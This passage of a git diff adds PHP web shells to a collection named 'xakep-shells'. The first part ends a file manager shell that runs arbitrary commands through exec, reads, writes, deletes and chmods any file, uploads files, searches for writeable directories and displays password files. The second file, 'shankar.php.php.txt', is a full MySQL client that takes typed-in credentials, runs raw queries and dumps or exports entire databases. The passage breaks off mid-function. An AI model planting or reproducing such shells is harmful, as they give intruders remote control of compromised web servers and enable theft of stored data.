+for($ach=7;$ach>=0;$ach--){echo"<OPTION value=$ach>$ach</OPTION>";}
+echo"</select>";}
+?>
+<input type="submit" name="ch_chmod" value="chmod">
+<input type=submit name=find value='find writeable'>
+<br>
+<hr>
+<?php
+#FIND WRITEABLE##############
+if(isset($_POST['find'])){
+echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" checked>Only writeable:<input type=checkbox name="onw" checked><input type=submit name=fww value="Find it">');}
+if(isset($_POST['fww']) && !empty($_POST['fpath'])){
+echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" '.(isset($_POST['dy'])?'checked':null).'>Only writeable:<input type=checkbox name="onw" '.(isset($_POST['onw'])?'checked':null).'><input type=submit name=fww value="Find it"><hr>');
+$arrfw=array($_POST['fpath']);
+$ife=0;
+while(++$ife<=count($arrfw)){
+$pathfw=$arrfw[$ife-1];
+if(is_readable($pathfw)){
+if($hfw=opendir($pathfw)){
+while(false!==($ffw=readdir($hfw))){
+$ffw=$pathfw.$ffw;
+if(!preg_match('/\/\.+$/',$ffw)){
+if(is_dir($ffw)){array_push($arrfw,$ffw.'/');}
+print(is_dir($ffw)?(is_writeable($ffw)?font('red',"$ffw/<br>",3) :(isset($_POST['onw'])?null:"$ffw/<br>")):(!isset($_POST['dy'])?(is_writeable($ffw)?font('green',"$ffw<br> ",3):(isset($_POST['onw'])?null:"$ffw<br>")):null));}}
+closedir($hfw);}}}}
+
+
+if(isset($_POST['eval'])){
+echo "<textarea cols=70 rows=7 name='ev'></textarea>\n";
+
+
+
+
+
+echo "";
+}
+############################################################################
+#RENAME
+if(isset($_POST['rename']) && $_POST['renold']<>'' && $_POST['rennew']<>''){
+if(file_exists($_POST['renold'])){
+@rename($_POST['renold'],$_POST['rennew']);
+}
+else $error=font('red',e(0));
+}
+#
+
+#RMDIR
+if(isset($_POST['rmd']) && isset($_POST['rmdir'])){
+if(file_exists($_POST['rmdir'])){
+if(is_dir($_POST['rmdir'])){
+if(@rmdir($_POST['rmdir'])) echo font('green',"dir ".b($_POST['rmdir'])." delet"); 
+else $error=font('red','dir not deleted');
+}
+else $error=font('red',e(3));
+}
+else $error=font('red',e(0));
+}
+#
+#CHMOD
+if(isset($_POST['ch_chmod']) && isset($_POST['ch_mod'])){
+if(file_exists($_POST['ch_mod'])){
+@chmod($_POST['ch_mod'],octdec($_POST['ch_p1'].$_POST['ch_p2'].$_POST['ch_p3']));}
+else $error=font('red',e(0));}
+#
+#DELETE
+if(isset($_POST['del']) && $_POST['rm']!=''){
+if(file_exists($_POST['rm'])){
+if(!is_dir($_POST['rm'])){
+@unlink($_POST['rm']);
+}
+else echo "<br>".font('red',e(4)."<br>");
+}
+else echo "<br>".font('red',e(0)."<br>");
+}
+#
+#EXEC
+if(!empty($_POST['exe'])){
+if(@exec($_POST['exec'],$ar)){
+echo "<textarea cols=70 rows=15>";
+foreach($ar as $line){
+echo $line."\n";
+}
+echo "</textarea>";}}
+#
+#OPEN FILE
+if(isset($_POST['op']) && $_POST['open']!=''){
+if(!test_file($_POST['open'])){
+if(!is_dir($_POST['open'])){
+$fil=file($_POST['open']);
+echo "<textarea cols=100 rows=20 name=edit>";
+foreach($fil as $vv){
+echo htmlspecialchars($vv);
+}
+echo "</textarea><br>".font('green',"FILE : ".$_POST['open'],3);
+if(is_writable($_POST['open'])==1){
+echo w(2).font('green','ACCESS GRANTED');
+echo "<input type=submit name=save value=save><input type=hidden value=".$_POST['open']." name=sv>";
+}}
+else $error=font('red',e(2));
+}
+else $error=test_file($_POST['open']);
+}
+if(isset($_POST['save'])){
+$fr=fopen($_POST['sv'],"w");
+$out=$_POST['edit'];
+fputs($fr,$out);
+fclose($fr);
+}
+#
+#CREATE FILE
+if(isset($_POST['cr']) && $_POST['new']!=''){
+if(is_writable(dirname($_POST['new']))){
+echo font('green',"Create new file : ".$_POST['new'],3)."<br><textarea name=newf cols=100 rows=20></textarea>
+<input type=submit name=cre value=create>
+<input type=hidden value=".$_POST['new']."  name=nf>";
+}
+else echo "<br>".font('red',e(2)."<br>");
+}
+if(isset($_POST['cre'])){
+$ee=fopen($_POST['nf'],'w+');
+$out=$_POST['newf'];
+fputs($ee,$out);
+fclose($ee);
+}
+#
+#MKDIR
+if(isset($_POST['mk']) && $_POST['mkdir']!=''){
+if(is_writeable('./')){
+@mkdir($_POST['mkdir']);
+echo font('green',"dir ".b($_POST['mkdir'])." create"); 
+}
+else echo font('red',e(2));
+}
+#
+echo "<input type=hidden name=th value=".getcwd()."></form>";
+#UPLOAD FILE
+if(isset($_POST['menu']) || isset($_POST['qq'])){
+echo "
+<form enctype=multipart/form-data  method=post>
+Save as :<input type=text name=name>File :<input name=userfile type=file>
+<input type=submit value=Send name=go_up>
+<input type=hidden name=qq>
+<input type=hidden name=th value=".getcwd()."></form>";
+if(isset($_POST['go_up'])){
+if(isset($_POST['name']) && $_POST['name']==''){
+$_POST['name']=$_FILES['userfile']['name'];}
+if(!preg_match('/^\//',$_POST['name'])){
+$_POST['name']=$_POST['th'].'/'.$_POST['name'];}
+if(is_uploaded_file($_FILES['userfile']['tmp_name'])){
+@copy($_FILES['userfile']['tmp_name'],$_POST['name']);}
+else echo "<br>".font('red',"Permisions denied");}}
+#
+#TEST PERM
+if(isset($_POST['tes']) && $_POST['test']!=''){
+$j=$_POST['test'];
+if(file_exists($j)){
+$w='';
+if(is_writeable($j)){
+$w=w(1).'WRITE'.w(1);
+}
+if(is_readable($j)){
+$w=$w.w(1).'READ'.w(1);
+}
+echo font('green',$w.sprintf("%o", (fileperms($_POST['test'])) & 0777));
+}
+else echo font('red',$e(0));
+}
+#
+#COPY
+if(isset($_POST['copy'])&& $_POST['strin']!='' && $_POST['remot']!=''){
+if(file_exists(dirname($_POST['remot']))){
+if(file_exists($_POST['strin'])){
+if(is_writable(dirname($_POST['remot']))){
+if(is_readable($_POST['strin'])){
+@copy($_POST['strin'],$_POST['remot']);
+}
+else echo font('red',"no read string file");
+}
+else echo font('red',"no write dest directory");
+}
+else echo font('red',"no such file");
+}
+else echo font('red',"no such dest dir");
+}
+#
+#CHECK DISK
+if(isset($_POST['free']) && $_POST['dirfree']!=''){
+if(file_exists($_POST['dirfree'])){
+$fre=@disk_free_space($_POST['dirfree'])/1048576;
+echo font('green',"Free space in ".b($_POST['dirfree'])." : ".$fre." Mb");
+$fre1=@disk_total_space($_POST['dirfree'])/1048576;
+echo "<br>".font('green',"Full size in ".b($_POST['dirfree'])." : ".$fre1." Mb");
+}
+else echo font('red',"No such disk");
+}
+#
+(isset($_POST['info']))?phpinfo():null;
+#
+#PASSWD
+if(!empty($_POST['passwd']) && isset($_POST['passw'])){
+echo "<center>".font('blue',"file : ".$_POST['passwd'],6)."</center><br><textarea cols=100 rows=15>\n";
+foreach(@file($_POST['passwd']) as $fed)echo $fed;
+echo "</textarea><br>\n";}
+#
+if(isset($error))echo $error;?>
+<hr><?php
+##################################################################################
+if(is_readable(getcwd())){
+if($h=opendir(getcwd())){
+$arr=array();
+while(false!==($f=readdir($h))){array_push ($arr,$f);}
+closedir($h);}}
+else die("<center>".b(font('red','FUNCTION LIST PERMISSION DENIED',6))."</center>");
+sort($arr);
+echo '<table width=800 bgcolor=#DFD6C8 cellspacing=0 cellpadding=0 border=1>';
+foreach($arr as $f){
+$l=@lstat($f);
+print((is_readable($f) && is_writeable($f))?"<tr><td>".w(1).b("R".w(1).font('red','RW',3)).w(1):(((is_readable($f))?"<tr><td>".w(1).b("R").w(4):"").((is_writable($f))?"<tr><td>".w(1).b(font('red','RW',3)):"")));
+$r=sprintf("%o",(@fileperms($f)) & 0777);
+$ow=posix_getpwuid($l[4]);
+$gr=posix_getgrgid($l[5]);
+$fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f));
+if(!is_readable($f) && !is_writeable($f)) echo "<tr><td>".w(12);
+echo "</td><td>$r</td><td>$fow</td>";
+if(!is_dir($f)){
+if(!is_link($f)){
+echo w(2)."<td><i>".$l[7]."</i></td>";}
+else echo "</td><td>link</td>";}
+else echo "</td><td>DIR</td>";
+$fi=htmlspecialchars($f);
+echo "<td>".@strftime('%B %e %H:%M',@filemtime($f))."</td><td>".(is_dir($f)?font('blue',$fi,3):$fi)."</td>\n";}
+?>
+</table></body></html>
+<?php exit; ?>
diff --git a/xakep-shells/PHP/shankar.php.php.txt b/xakep-shells/PHP/shankar.php.php.txt
new file mode 100644
index 0000000..47b475b
--- /dev/null
+++ b/xakep-shells/PHP/shankar.php.php.txt
@@ -0,0 +1,748 @@
+<?php
+
+        ##############################################################
+        # Simple PHP Mysql client (c) ShAnKaR (Updated on 28.11.2007)#
+        ##############################################################
+
+@set_time_limit(0);
+
+
+if(get_magic_quotes_gpc()){
+while(list($key,$val)=each($_POST)){
+$_POST[$key]=stripslashes($val);}}
+
+$far=array('f','gz','bz','.txt','.gz','.bz2');
+
+
+//--------------------------
+
+$text="\$etext=\"<html><head><title>Simple PHP Mysql client</title></head>
+\n<body bgcolor=#C2DDFF><form method='POST' enctype=multipart/form-data><div style='width:100%;background-color:#A8B8F1;'>\n";
+
+$a=array('srv','user','pass','db');$i=-1;
+while($i++<3){
+$text.="<input type='text' size=18 name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?'{$_POST[$a['.$i.']]}':(($i==0)?'localhost':null))."'>\n";}
+
+$text.="<input type='submit' name='sql' value=' SQL '>\n<b>No Display:</b>
+<input type=checkbox name='dd' ".(isset($_POST['dd'])?'checked':'').">DB<input type=checkbox name='dt' ".(isset($_POST['dt'])?'checked':'').">Tables&nbsp;&nbsp;&nbsp;&nbsp;\".(isset(\$version)?'<font style=\'font-style:italic;font-variant:small-caps;font-weight:bolder;\' >'.\$version[0].'</font>':'').\"</div><a href='http://shankar.name/sql.phps' title='simple PHP Mysql client' style='position:fixed;right:0;font-size:7pt;color:red;font-weight:bold;' target='_blank' >S<br>i<br>m<br>p<br>l<br>e<br> <br>P<br>H<br>P<br> <br>M<br>y<br>s<br>q<br>l<br> <br>c<br>l<br>i<br>e<br>n<br>t<br></a>\"";
+
+
+
+if(isset($_POST['sql'])){
+
+if(isset($_POST['user']))$user=$_POST['user'];
+if(isset($_POST['pass']))$password=$_POST['pass'];
+
+if(isset($_POST['srv'])){
+$server=$_POST['srv'];
+
+$connect=@mysql_connect($server,$user,$password) or die(eval($text.";echo \$etext.\"</form>not connect\";"));}
+
+else{die(eval($text.";echo \$etext.\"</form>\";"));}
+
+$version=mysql_fetch_row(mysql_query('SELECT version()'));
+
+if(!empty($_POST['db'])){@mysql_select_db($_POST['db'])or die(eval($text.";echo \$etext.\"</form>Could not select db<br>\";"));}
+
+
+if(empty($_POST['table_sel']) && !empty($_POST['table_sel2']))$_POST['table_sel']=$_POST['table_sel2'];
+
+
+function select(){
+global $connect;
+
+
+if(isset($_POST['table_sel2']) && $_POST['table_sel']!=$_POST['table_sel2']){$_POST['sort']=null;$_POST['br_st']=null;}
+$sort=(!empty($_POST['sort'])?'ORDER BY `'.trim($_POST['sort']).'` '.(($_POST['asc']==='asc')?'ASC':'DESC').' ':'');
+
+$co=((isset($_POST['br_st']) && isset($_POST['br_en']) && isset($_POST['brow']))?$_POST['br_en'].','.$_POST['br_st']:'0,20');
+
+
+
+$_POST['querysql']=((!empty($_POST['querysql']) && isset($_POST['push']))?$_POST['querysql']:"SELECT * FROM `".$_POST['table_sel']."` $sort limit $co");
+
+
+
+$result=@mysql_query($_POST['querysql'],$connect) or print("<input type=submit name=push value=Run><br><textarea cols=70% rows=8 name='querysql'>".$_POST['querysql']."</textarea><br>");
+
+if(is_resource($result)){
+$meta=mysql_fetch_field($result);
+$tables=$meta->table;
+$tr=0;
+if($tables==true){
+
+$tr=1;
+if($quer=mysql_query("select count(*) from $tables"))$n=mysql_fetch_array($quer);
+else $tr=2;
+
+}
+
+else{
+
+$_POST['table_sel']=$tables;
+if($tr==1)$n=mysql_fetch_row(mysql_query('select count(*) from '.$_POST['table_sel']));
+
+
+}
+
+if($tr>0){
+print($tr==1)?"<input type=hidden name='table_sel2' value='$tables'>":'';
+$arr=array();
+for ($i=0;$i<mysql_num_fields($result); $i++){
+if(ereg('primary_key',mysql_field_flags($result,$i)))
+$arr[]=mysql_field_name($result,$i);}
+}
+
+
+$up_e='';
+
+echo "<div style='width:100%;height:440px;overflow:auto;'><table border=1>";
+
+
+$fields=@mysql_list_fields($_POST['db'],$tables,$connect);
+$coms=@mysql_num_fields($fields);
+if($coms>0){
+echo "<tr bgcolor='#A8B8F1'>\n<td width=21></td>";
+for($i=0;$i<$coms;$i++){
+$lk=mysql_field_name($fields, $i);
+print((count($arr)>0 && array_search($lk,$arr)!==false)?"<td><u><b>$lk</b></u></td>":"<td>$lk</td>\n");
+}}
+
+while($line=mysql_fetch_assoc($result)){
+$linet=$line;
+if($tr>0){
+if(count($arr)==0){
+while(list($key,$val)=each($line)){$up_e.="`$key`='".addslashes($val)."' and ";}
+$up_e=substr($up_e,0,-5);}
+
+else{
+while(list($key,$val)=each($line)){
+if(array_search($key,$arr)!==false){$up_e.="`$key`='".addslashes($val)."' and ";}}
+$up_e=substr($up_e,0,-4);
+}
+
+$up_e=urlencode($up_e);
+
+print "</tr><tr><td bgcolor='#C1D2C5'>".(($tr==1)?"<input type=radio name=edit value='$up_e'>":'&nbsp;&nbsp;')."</td>\n";
+}
+else echo "<tr>\n";
+
+
+$up_e='';
+
+foreach($line as $col_value){
+echo "<td>".((strlen($col_value)>40)?'<textarea cols=40 rows=7>'.htmlspecialchars($col_value).'</textarea>':htmlspecialchars($col_value))."</td>\n";
+}
+
+echo "</tr>\n";}
+
+echo "</table></div>";
+if($tr==1){
+echo "<div style='width:100%;background-color:#dfdfdf;'><input type=submit name='brow' value='Browse'><b>&nbsp;Sort by
+<select name=sort><option value=''></option>";
+
+foreach(array_keys($linet) as $lkk){
+print "<option value='$lkk'".((isset($_POST['sort']) && $_POST['sort']===$lkk)?' selected':'').">$lkk</option>\n";}
+
+echo "</select><select name='asc'><option value='asc'>ASC</option><option value='desc'".((isset($_POST['asc']) && $_POST['asc']==='desc')?' selected':'').">DESC</option></select>
+Show<input type=text size=5 value=".((isset($_POST['br_st']) && isset($_POST['brow']))?$_POST['br_st']:$n[0])." name='br_st'>row(s) start from<input type=text size=5 value=".((isset($_POST['br_en']))?$_POST['br_en']:'0')." name='br_en'></b>
+<input type=submit name=editr value=Edit><input type=submit name='dell' value=Delete></div>";
+
+}
+mysql_free_result($result);
+
+}
+else{
+if($result===false)echo mysql_error($connect);
+else echo 'Query susceful! %)';
+}
+
+}
+
+
+
+
+
+
+
+
+
+
+
+
+function load($file){
+global $far;
+if(file_exists($file)){
+eval("\$zd=".$far[$_POST['compr']]."open(\$file,'r');");
+($_POST['compr']<2)?eval("\$buff='';while(!".$far[$_POST['compr']]."eof(\$zd)){\$buff.=".$far[$_POST['compr']]."gets(\$zd);}"):eval("\$buff=bzread(\$zd);");
+eval($far[$_POST['compr']]."close(\$zd);");
+return($buff);
+}
+else{
+print 'no such file!';
+}
+}
+
+function write($data){
+global $dump,$fp,$far;
+($_POST['save']==0)?$dump.=$data:(isset($fp)?eval($far[$_POST['compr']]."write(\$fp,\$data);"):null);}
+
+function sqlh(){
+if($_POST['save']>0){
+global $server,$dbtr;
+write("#\n#Server : ".getenv('SERVER_NAME')."
+#DB_Host : ".$server."
+#DB : ".$_POST['db'].
+(($dbtr==0)?"
+#Table : ".$_POST['table_sel']:"")."\n#\n\n");}}
+
+function sql($tabel_sel){
+global $connect;
+$row=mysql_fetch_row(mysql_query("SHOW CREATE TABLE `$tabel_sel`",$connect));
+write("DROP TABLE IF EXISTS `$tabel_sel`;\n".$row[1].";\n\n");}
+
+function test($aaa){
+$d=array();
+while(list($key,$val)=each($aaa)){$d[$key]=addslashes($val);}
+return($d);}
+
+function sql1($table_sel){
+
+global $connect,$dbtr;
+$result=mysql_query("SELECT ".(!empty($_POST['ufiled'])?$_POST['ufiled']:'*')." FROM `$table_sel` ".(($dbtr==0)?'LIMIT '.$_POST['ulimits'].','.$_POST['ulimite']:''),$connect);
+
+
+
+while($line=mysql_fetch_assoc($result)){
+((!isset($key))?($key=implode('`, `',array_keys($line))):null);
+$ddd=test(array_values($line));
+$val=implode('\', \'',$ddd);
+write("INSERT INTO `".$table_sel."`(`".$key."`) VALUES ('".$val."');\n");}
+
+mysql_free_result($result);}
+
+function head($tmpfname,$name){
+header("Content-Type: application/octet-stream; name=\"$name\"");
+header("Content-Length: ".filesize($tmpfname)."");
+header("Content-disposition: attachment; filename=\"$name\"");
+$fd=fopen($tmpfname,"r");
+while(!feof($fd)){
+echo fgets($fd,4096);}
+fclose($fd);
+($_POST['save']==1)?unlink($tmpfname):null;
+exit;}
+
+function csv($table_sel){
+global $connect,$far,$dbtr;
+$res=mysql_query("SELECT ".(!empty($_POST['ufiled'])?$_POST['ufiled']:'*')." FROM `$table_sel` ".(($dbtr==0)?'LIMIT '.$_POST['ulimits'].','.$_POST['ulimite']:''),$connect);
+$i=0;
+$keys='';
+while($key=@mysql_field_name($res,$i++))$keys.=$key."; ";
+
+write("# Fields: \n#".$keys."\n\n");
+if(mysql_num_rows($res)>0){
+
+
+
+
+while($row=mysql_fetch_assoc($res)){
+$values=array_values($row);
+foreach($values as $k=>$v){$values[$k]=addslashes($v);}
+$values=implode($_POST['cvs_term'],$values);
+write($values."\n");
+}
+
+
+}}
+
+
+if(isset($_POST['back']) && (isset($_POST['table_sel']) ||  $_POST['dbtr']=1 )){
+$dbtr=$_POST['dbtr'];
+$dump='';
+
+if($_POST['save']>0){
+
+$tmpfname=($_POST['save']==1)?tempnam($_POST['save_p'],"sess_"):$_POST['local'];
+if(is_writeable(dirname($tmpfname))){
+eval("\$fp=".$far[$_POST['compr']]."open(\$tmpfname,'w');");
+}
+}
+
+sqlh();
+
+switch($_POST['as']){
+case 0:
+
+switch($_POST['as_sql']){
+case 0:
+
+
+
+if($dbtr==1){
+$it=0;
+while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){
+sql($table_sel);
+
+
+}}
+
+else sql($_POST['table_sel']);
+
+
+break;
+case 1:
+
+
+if($dbtr==1){
+$it=0;
+while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){
+sql($table_sel);
+sql1($table_sel);
+}}
+else {
+sql($_POST['table_sel']);
+sql1($_POST['table_sel']);
+}
+
+
+
+break;
+case 2:
+if($dbtr==1){
+$it=0;
+while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){
+sql1($table_sel);
+}}
+else sql1($_POST['table_sel']);
+
+
+break;}
+
+if($_POST['save']>0){
+if(isset($fp)){
+eval($far[$_POST['compr']]."close(\$fp);");
+
+($_POST['save']==1)?head($tmpfname,(($dbtr==1)?$_POST['db']:$_POST['table_sel']).$far[$_POST['compr']+3]):($message='<center><b>'.$_POST['local'].' Saved</b><center>');}
+else $message='<center><b>No writeable select Dir</b><center>';
+}
+
+break;
+case 1:
+//-----------------------------------
+
+
+if($dbtr==1){
+$it=0;
+while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){
+write("\n# Table: $table_sel\n");
+csv($table_sel);
+
+
+}}
+
+else csv($_POST['table_sel']);
+if($_POST['save']>0){
+eval($far[$_POST['compr']]."close(\$fp);");
+($_POST['save']==1)?head($tmpfname,(($dbtr==1)?$_POST['db']:$_POST['table_sel']).$far[$_POST['compr']+3]):'';
+}
+
+//------------------------------
+break;}}
+
+
+
+
+eval($text.";echo \$etext.\"\n<table width=100% height=90%><tr><td width=10% style='vertical-align:top'><table><tr><td>\";");
+
+if(!isset($_POST['dd'])){
+$db_list=mysql_list_dbs($connect);
+echo "<select name='db'>\n";
+
+while($row=mysql_fetch_assoc($db_list)){
+$db1=$row['Database'];
+echo "<option value='$db1'".(($db1===$_POST['db'])?' selected':'').">$db1</option>\n";
+}
+
+echo "</select>";
+}
+else echo "<input type=text name='db' value='".$_POST['db']."'>\n";
+
+
+echo "</td></tr><tr><td>\n";
+
+if(!empty($_POST['db'])){
+$it=0;
+$table_selt=array();
+while($table_selt[]=@mysql_tablename(mysql_list_tables($_POST['db']),$it++));
+
+if(isset($_POST['table_sel']) && array_search($_POST['table_sel'],$table_selt)===false)$_POST['table_sel']='';
+
+
+if(mysql_num_rows(mysql_list_tables($_POST['db']))>0){
+
+
+
+if(!isset($_POST['dt'])){
+echo "<select name='table_sel' multiple size=27>\n";
+$it=0;
+while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){
+
+$n=mysql_fetch_array(mysql_query("select count(*) from $table_sel"));
+(isset($_POST['table_sel']) && $_POST['table_sel']===$table_sel)?$nt=$n:null;
+echo "\n<option value='$table_sel'".((isset($_POST['table_sel']) && $_POST['table_sel']===$table_sel)?'selected':'').">$table_sel(".$n[0].")</option>";
+
+}
+
+
+
+echo "</select>";
+}
+else {
+if(!empty($_POST['table_sel']))$nt=mysql_fetch_array(mysql_query("select count(*) from ".$_POST['table_sel']));
+echo "<input type=text name='table_sel' value='".(isset($_POST['table_sel'])?$_POST['table_sel']:'')."'>\n";
+}}
+
+else echo '&nbsp;<b>No tables =\</b>';
+
+echo "</td></tr></table></td><td style='vertical-align:top'>
+<table width=100% height=100% bgcolor='#E3FFF2'><tr><td height=20 bgcolor=#dfdfdf width=100%><nobr><b>
+<input type=radio Name='go' value=0>SQL
+<input type=radio Name='go' value=1>Search
+<input type=radio Name='go' value=2>Export
+<input type=radio Name='go' value=3>Import
+";
+if(!empty($_POST['table_sel']))echo "
+<input type=radio Name='go' value=4>Browse
+<input type=radio Name='go' value=5>Insert";
+
+
+
+
+
+echo "</b></nobr></td></tr><tr width=100%><td width=100%>\n".(isset($message)?$message:'');}
+
+if(isset($_POST['push']) && !empty($_POST['querysql']))$_POST['go']=4;
+
+if(isset($_POST['back']))$_POST['go']=2;
+
+if(isset($_POST['brow']))$_POST['go']=4;
+
+if(isset($_POST['editr']) && isset($_POST['edit']))$_POST['go']=6;// EDIT
+
+if(isset($_POST['ed_save']))$_POST['go']=7;//INSERT
+
+if(isset($_POST['search']))$_POST['go']=8;
+
+if(isset($_POST['up']) && (!empty($_POST['load']) || !empty($_POST['upload'])))$_POST['go']=9;
+elseif(isset($_POST['up']))$_POST['go']=3;
+
+if((isset($_POST['dell']) && isset($_POST['edit']))|| isset($_POST['delp']))$_POST['go']=10;
+
+if(!isset($_POST['go']) && !empty($_POST['table_sel']))$_POST['go']=4;
+
+
+
+
+
+if(isset($_POST['go'])){
+switch($_POST['go']){
+case 0:
+
+//SQL
+
+echo "<input type=submit name=push value=Run><br>
+<textarea cols=70% rows=8 name='querysql'>\n".((!empty($_POST['querysql']))?htmlspecialchars($_POST['querysql'],ENT_QUOTES):((!empty($_POST['table_sel']))?"SELECT * FROM `".$_POST['table_sel']."` WHERE 1":null))."</textarea><br><br>\n";
+
+
+break;
+
+
+case 1:
+echo "
+<table>
+<tr bgcolor='#A8B8F1'><td>&nbsp;Location</td><td>&nbsp;Options</td><td>&nbsp;Search conditions</td><td>&nbsp;Limit</td><td></td></tr><tr bgcolor='#D7D7D7'>
+<td>
+<select name='locas'>
+<option value=0>DB: ".$_POST['db']."</option>
+".(!empty($_POST['table_sel'])?'<option value=1>Tb: '.$_POST['table_sel'].'</option>':'')."
+</select>
+</td>
+
+<td>
+<select name=opts>
+<option value='='>=</option>
+<option value='>'>></option>
+<option value='>='>>=</option>
+<option value='<'><</option>
+<option value='<='><=</option>
+<option value='!='>!=</option>
+<option value='LIKE'>LIKE</option>
+<option value='NOT LIKE'>NOT LIKE</option>
+<option value='IS NULL'>IS NULL</option>
+<option value='IS NOT NULL'>IS NOT NULL</option>
+</select></td>
+<td>
+<input type=text name='seart'></td>
+<td><input type=text name='limits'></td>
+<td><input type=submit name='search' value='search'></td></tr>
+
+</table>
+
+";
+
+break;
+
+case 3:
+//IMPORT
+
+
+echo "<center><div style='width:300;background-color:#A8B8F1;'>Load file: &nbsp;<input type=file name='upload'><br>
+Local file: <input type=text name='load' size=30><br>
+<input type=radio name=compr value=0 checked>Text".(function_exists('gzencode')?'<input type=radio name=compr value=1>Gzip':'').(function_exists('bzcompress')?'<input type=radio name=compr value=2>Bzip2':'')."</div>
+<input type=submit name='up' value='Import'></center>";
+
+
+
+break;
+
+
+
+case 4:
+
+//BROWSE
+
+
+if(!empty($_POST['table_sel']) || isset($_POST['querysql']))select();
+
+//+++++++++++++++++++++++++++++++++++BROWSE _ END ++++++++++++++++++++++++++++++
+break;
+
+
+case 2:
+
+//EXPORT
+
+if(!isset($_POST['back'])){
+echo '<table height=250 align="center"><TR><TD>
+<table height=100%>
+<tr><td bgcolor="#A8B8F1" width="100" height="20"><b>&nbsp;&nbsp;Export as</b></td></tr>
+<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="0" checked><b>&nbsp;&nbsp;SQL</b></td></tr><tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="1"><b>&nbsp;&nbsp;CSV</b></td></tr><tr><td height=100%></td></tr>
+</table></TD><td>
+<table width="140" height=100%>
+<TR><TD bgcolor="#A8B8F1" height="20"><b>&nbsp;&nbsp;SQL</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="0"><b>Only structure</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="1" checked><b>All</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="2"><b>Only data</b></TD></TR>
+<TR><TD bgcolor="#A8B8F1" height="20"><b>CSV</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><b>Terminated&nbsp;</b><input size=2 type=text Name="cvs_term" value=":"></TD></TR><tr><td height=100%></td></tr></table></td><td>
+<table height=100%><tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="0" checked><b>&nbsp;View</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="1"><b>&nbsp;Download</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="130" height="40"><b>&nbsp;Temp path</b><br><input type=text Name="save_p" value="/tmp"></td></tr>
+<tr><td bgcolor="#E6D29C" width="100" height="20">
+<input type=radio Name="save" value="2"><b>&nbsp;Save as local file</b><br>
+<input type=text value="./db_backup" name="local">
+</td></tr>
+<tr><td height=100%></td></tr>
+</table></td><td>
+<table width="120" height=100%>
+<TR><TD bgcolor="#A8B8F1" height="20"><b>&nbsp;&nbsp;Compression</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="0" checked><b>None</b></TD></TR><TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="1" '.
+(function_exists('gzencode')?'':'disabled="true"').'><b>Gzip</b></TD></TR><TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="2" '.
+(function_exists('bzcompress')?'':'disabled="true"').'><b>Bzip2</b></TD></TR><tr><td height=100%></td></tr></table></td><td>
+<table width="150" height=100%>
+<TR><TD bgcolor="#A8B8F1" height="20"><b>&nbsp;&nbsp;Backup</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="dbtr" value="1" checked><b>All DataBase</b></TD></TR>'.(!empty($_POST['table_sel'])?'<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="dbtr" value="0" ><b>Only One Table</b></TD></TR>':'').'<tr><td height=100%></td></tr>
+</table></td></TR><tr><td></tr></table>
+';
+if(isset($nt)){
+echo '
+<table width="100%"><tr><td bgcolor="#A8B8F1"><b>If backup only one table, use this options</b>(optional)</td><td></td>
+</tr>
+<tr bgcolor="#D0E0FF"><td><b>Use Fileds (Separator as ",")</b>,if emty then use All Fileds</td><td><input type=text name="ufiled" size=40 ></td></tr>
+<tr bgcolor="#D0E0FF"><td><b>Limit:</b></td><td><input type=text name=ulimits size=6 value=0><input type=text name=ulimite size=6 value='.($nt[0]).'></td></tr>
+</table>';
+}
+echo '<input type=submit value=backup name=back>';
+}
+
+
+if(isset($_POST['back']) && $_POST['save']==0)echo "<textarea cols=100 rows=20>".htmlspecialchars($dump)."</textarea>";
+break;
+
+
+
+case 5:
+
+//INSERT IN TABLE
+if(!empty($_POST['table_sel'])){
+echo "<div style='width:100%;height:430;overflow:auto;'><table>\n";
+$fields=mysql_list_fields($_POST['db'],$_POST['table_sel'],$connect);
+
+for($i=0;$i<mysql_num_fields($fields);$i++){
+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($fields,$i).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($fields,$i).'('.mysql_field_len($fields,$i).")</b></td><td>".((mysql_field_len($fields,$i)<40)?"<input type='text' name='ed_key:".mysql_field_name($fields,$i)."' value='' size=40>":"<textarea name='ed_key:".mysql_field_name($fields,$i)."' cols=31 rows=7></textarea>")."</td></tr>\n";}
+
+echo "</table></div><input type=hidden name=insert value=1><input type=submit name=ed_save value=Insert>";
+
+}
+break;
+
+
+
+
+
+
+case 6:
+
+
+//EDIT
+
+
+
+
+if($_POST['table_sel']===$_POST['table_sel2']){
+
+$up_e=$_POST['edit'];
+echo "<input type=hidden name=edit value='$up_e'>";
+$up_e=urldecode($_POST['edit']);
+echo "<div style='width:100%;height:440;overflow:auto;'><table>\n";
+$fi=0;
+
+$result=mysql_query("SELECT * FROM `".$_POST['table_sel']."` WHERE $up_e",$connect);
+
+while($line=mysql_fetch_assoc($result)){
+
+foreach($line as $key=>$col_value){
